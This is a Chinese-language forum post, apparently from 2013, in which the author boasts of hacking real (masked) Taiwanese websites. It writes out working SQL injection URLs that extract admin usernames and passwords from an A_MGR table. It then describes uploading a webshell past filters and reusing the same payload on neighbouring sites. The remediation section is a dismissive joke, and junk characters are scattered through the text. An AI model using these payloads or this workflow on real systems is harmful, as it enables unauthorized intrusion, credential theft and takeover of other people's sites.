发现一个注入点4 L2 y2 v% j e1 v1 y
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833899 w0 }& k. B) y: K, Q+ G
' {( A& m( e/ P# t
习惯性的加’having1=1--
; m9 _) J6 y0 y: L$ j- ?5 @& i/ U8 ~, A' F/ p. D% i
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—2 ?3 W6 z4 a6 }- ?+ P: {0 R. o
6 D5 R3 x# l( ^) V! [6 ~7 B
06 ^9 B. @' T: s7 m
. r( _7 n' P3 k! L6 x+ D爆出Diary_A.dl_Title(这时候很激动啊)' M' n& O% w. @( A% y4 Z) m
F4 d) h5 _* N. {& W8 i3 ]
那么继续
+ C" G. _- J+ Thttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—. q/ ?6 N$ W$ W/ ~' U# O
5 X0 _+ A8 w, g) K继续,一直爆下去9 G# x/ h6 z9 l5 N; D% c7 T3 x
! ]7 f! h2 V$ s
爆到几个字段和表段 但是没找到需要的管理用户的字段
" f3 {3 J; X" j5 f6 T+ d# J! G, f# W h
蛋疼了 怎么办 然后去后台登陆页看源码+ }% c6 V& B7 Z2 R! `! [6 w
$ t5 [( V( a" _, H9 y4 X9 g. _9 @0
: M7 ]# S$ @9 Y
6 i d' V2 g' P4 X, d+ n8 [Input name= “ADUID”
4 ^* N6 s' q! o! K5 S6 M3 R7 i& KInput name= “ADPWD”
+ |' ~4 X% H5 d4 m7 X( M8 B* i; l) D+ v% i2 V" z, t4 O- O8 p2 ?( d1 e
很幸运 找到了字段那就继续" S" z$ O& k, i! t% `; S
找到之后开始爆用户
: _, G& l% Q/ S; x6 U" uhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—* T7 v0 E; b3 M, r& _% s& H- w
爆密码
( g8 X' Z: |2 ?6 \6 u" [http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—" H+ v' N8 X0 x' }' a* `6 Q
测试了下 这个注入点只能爆到文章哪里的表 , n! m0 \2 ^( ]7 _4 H
+ Q: N) Z% j6 F7 K9 m9 g, v
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
& x* b1 `- z/ R, \! e6 [
. t& F% K; j* ?4 Z, A' y8 }5 Q又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了7 @5 U% Y# J3 v
8 |$ U0 g& |7 [) L0 O& d9 l473& @1 ]- `9 c: F
/ L- v5 M, y( J' k: t9 W& }进后台+ W2 J7 |6 v1 @
, |8 ^ d. i) A. G, C
& X: N) {; S. p* i! q! Y+ V发现几个上传点 有的地方不能上传 而且防止恶意代码
, v% s" v2 @8 L, A, U- x$ d" w# s$ A9 [! M0 {* V. C; p' @1 k
没办法 各种百度各种找大牛 找到一只好像可以突破的马
" `4 S- C: o; C1 x& a% m0 D
9 w. c p* u9 F8 h) L8 f5 R( O( r: J' C j, O2 h
在系统管理那里直接上传 不过没有显示地址) ?5 f: v1 x* b1 r. j4 x
. c& U+ W) w" e# G! Z' D+ e& s再上传一次 抓包 搞定OK( r) F1 f9 {0 j' x" n1 T
* q" t0 k& c1 x2 |) i3 ]4 k
$ U5 l) J4 l9 |) a( R( D
{1 ]5 t, a1 e/ ]6 _472
. s; I3 j' Q8 {3 H; I; P5 }: t5 G9 u5 z1 n
晚上不行了 去睡觉。。。
2 [4 o) X9 d1 `第二天刚起床 闲的没事做继续日站吧
% K% g# I$ B: \( P; s; J: X, a" [) B. F# m' L" G3 A L
找个站 就把这个站的旁c扫了下" U* u) w! z: B- y& ?- }
, C1 d7 q) N; k M
发现c段也有一个购物站 ,然后还和这个站的模板差不多5 Q6 t( C5 M2 |( e
1 U- I; ?9 e' I- y5 \
就找到会员登录口测试! `7 q1 o) I- s5 H: o& N
/ j9 M# @; g" u; m5 {8 _& C
'and (select top 1 MGR_UID from A_MGR)>0—
6 _& O8 v; N7 m2 W( ^果断爆到了 这时候我很激动 通杀& A( b, n: a4 v& |8 X$ W0 ?
& z) s# ]. x. W6 m$ \0 S- G再次翻c段
# K8 K: J( s' g% d F: ?) T- g8 a6 W9 I
翻出几个站 都成功拿下0 Q* S- m3 m% u4 p& `" d
2 M2 i9 d4 q' D9 Z1 G/ O
8 y6 Q8 g, u; r
* I$ V* v. I2 p A K5 x5 k$ J修复方案:
/ ]1 y) j( o: {- O他们比我专业
' o6 X8 K% c( t. I1 E
_% t0 s0 \4 u) ?: z0 _
0 k1 l# D" a( m! l7 L, F/ z, B( W+ f
3 ?# Z3 P3 o! Z |* i( X" F |
发表于 2013-4-4 17:40:38
收藏
支持
反对